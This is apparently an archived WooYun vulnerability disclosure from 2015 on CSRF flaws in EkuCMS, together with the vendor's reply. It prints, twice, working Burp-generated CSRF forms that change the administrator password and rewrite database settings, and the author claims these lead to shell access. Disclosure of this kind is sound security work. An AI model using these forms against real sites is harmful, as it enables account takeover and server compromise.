当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0102877

漏洞标题:易酷CMS存在CSRF漏洞(可getshell)

相关厂商:ekucms.com

漏洞作者: 90Snake

提交时间:2015-03-25 12:41

修复时间:2015-06-24 12:14

公开时间:2015-06-24 12:14

漏洞类型:CSRF

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-25: 细节已通知厂商并且等待厂商处理中
2015-03-26: 厂商已经确认,细节仅向厂商公开
2015-03-29: 细节向第三方安全合作伙伴开放
2015-05-20: 细节向核心白帽子及相关领域专家公开
2015-05-30: 细节向普通白帽子公开
2015-06-09: 细节向实习白帽子公开
2015-06-24: 细节向公众公开

简要描述:

CSRF

详细说明:

危害很大
首先是可以改管理密码

QQ截图20150321190211.jpg


<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://127.0.0.1/index.php?s=Admin/Master/Update" method="POST">
      <input type="hidden" name="id" value="1" />
      <input type="hidden" name="pwd2" value="7fef6171469e80d32c0559f88b377245" />
      <input type="hidden" name="pwd" value="shabi123" />
      <input type="hidden" name="repwd" value="shabi123" />
      <input type="hidden" name="usertype&#91;0&#93;" value="1" />
      <input type="hidden" name="usertype&#91;1&#93;" value="1" />
      <input type="hidden" name="usertype&#91;2&#93;" value="1" />
      <input type="hidden" name="usertype&#91;3&#93;" value="1" />
      <input type="hidden" name="usertype&#91;4&#93;" value="1" />
      <input type="hidden" name="usertype&#91;5&#93;" value="1" />
      <input type="hidden" name="usertype&#91;6&#93;" value="1" />
      <input type="hidden" name="usertype&#91;7&#93;" value="1" />
      <input type="hidden" name="usertype&#91;8&#93;" value="1" />
      <input type="hidden" name="usertype&#91;9&#93;" value="1" />
      <input type="hidden" name="usertype&#91;10&#93;" value="1" />
      <input type="hidden" name="usertype&#91;11&#93;" value="1" />
      <input type="hidden" name="usertype&#91;12&#93;" value="1" />
      <input type="hidden" name="usertype&#91;13&#93;" value="1" />
      <input type="hidden" name="usertype&#91;14&#93;" value="1" />
      <input type="hidden" name="usertype&#91;15&#93;" value="1" />
      <input type="hidden" name="usertype&#91;16&#93;" value="1" />
      <input type="hidden" name="usertype&#91;17&#93;" value="1" />
      <input type="hidden" name="usertype&#91;18&#93;" value="1" />
      <input type="hidden" name="submit" value="æ&#143;&#144;äº&#164;" />
      <input type="hidden" name="&#95;&#95;hash&#95;&#95;" value="8637bf9833545453f7649bd6e16ad060" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


QQ截图20150321190252.jpg

QQ截图20150321190259.jpg


还有可以改数据库

QQ截图20150321190948.jpg


<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://127.0.0.1/index.php?s=Admin/Config/Updatedb" method="POST">
      <input type="hidden" name="con&#91;db&#95;host&#93;" value="admin" />
      <input type="hidden" name="con&#91;db&#95;name&#93;" value="ekucms" />
      <input type="hidden" name="con&#91;db&#95;user&#93;" value="root" />
      <input type="hidden" name="con&#91;db&#95;pwd&#93;" value="admin888" />
      <input type="hidden" name="con&#91;db&#95;port&#93;" value="3306" />
      <input type="hidden" name="submit" value="æ&#143;&#144;äº&#164;" />
      <input type="hidden" name="&#95;&#95;hash&#95;&#95;" value="c59f9ef9c6e6f578038f368ff2b9817a" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


QQ截图20150321191829.jpg


这里可以执行SQL语句,可适当利用getshell,提权

漏洞证明:

危害很大
首先是可以改管理密码

QQ截图20150321190211.jpg


<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://127.0.0.1/index.php?s=Admin/Master/Update" method="POST">
      <input type="hidden" name="id" value="1" />
      <input type="hidden" name="pwd2" value="7fef6171469e80d32c0559f88b377245" />
      <input type="hidden" name="pwd" value="shabi123" />
      <input type="hidden" name="repwd" value="shabi123" />
      <input type="hidden" name="usertype&#91;0&#93;" value="1" />
      <input type="hidden" name="usertype&#91;1&#93;" value="1" />
      <input type="hidden" name="usertype&#91;2&#93;" value="1" />
      <input type="hidden" name="usertype&#91;3&#93;" value="1" />
      <input type="hidden" name="usertype&#91;4&#93;" value="1" />
      <input type="hidden" name="usertype&#91;5&#93;" value="1" />
      <input type="hidden" name="usertype&#91;6&#93;" value="1" />
      <input type="hidden" name="usertype&#91;7&#93;" value="1" />
      <input type="hidden" name="usertype&#91;8&#93;" value="1" />
      <input type="hidden" name="usertype&#91;9&#93;" value="1" />
      <input type="hidden" name="usertype&#91;10&#93;" value="1" />
      <input type="hidden" name="usertype&#91;11&#93;" value="1" />
      <input type="hidden" name="usertype&#91;12&#93;" value="1" />
      <input type="hidden" name="usertype&#91;13&#93;" value="1" />
      <input type="hidden" name="usertype&#91;14&#93;" value="1" />
      <input type="hidden" name="usertype&#91;15&#93;" value="1" />
      <input type="hidden" name="usertype&#91;16&#93;" value="1" />
      <input type="hidden" name="usertype&#91;17&#93;" value="1" />
      <input type="hidden" name="usertype&#91;18&#93;" value="1" />
      <input type="hidden" name="submit" value="æ&#143;&#144;äº&#164;" />
      <input type="hidden" name="&#95;&#95;hash&#95;&#95;" value="8637bf9833545453f7649bd6e16ad060" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


QQ截图20150321190252.jpg

QQ截图20150321190259.jpg


还有可以改数据库

QQ截图20150321190948.jpg


<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://127.0.0.1/index.php?s=Admin/Config/Updatedb" method="POST">
      <input type="hidden" name="con&#91;db&#95;host&#93;" value="admin" />
      <input type="hidden" name="con&#91;db&#95;name&#93;" value="ekucms" />
      <input type="hidden" name="con&#91;db&#95;user&#93;" value="root" />
      <input type="hidden" name="con&#91;db&#95;pwd&#93;" value="admin888" />
      <input type="hidden" name="con&#91;db&#95;port&#93;" value="3306" />
      <input type="hidden" name="submit" value="æ&#143;&#144;äº&#164;" />
      <input type="hidden" name="&#95;&#95;hash&#95;&#95;" value="c59f9ef9c6e6f578038f368ff2b9817a" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


QQ截图20150321191829.jpg


这里可以执行SQL语句,可适当利用getshell,提权

修复方案:

加token

版权声明:转载请注明来源 90Snake@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:2

确认时间:2015-03-26 12:12

厂商回复:

前提是需要知道系统的重要参数才可利用是吗,比如管理员帐号、密码、DB信息等,token确有必要,谢谢您的提醒~!

最新状态:

暂无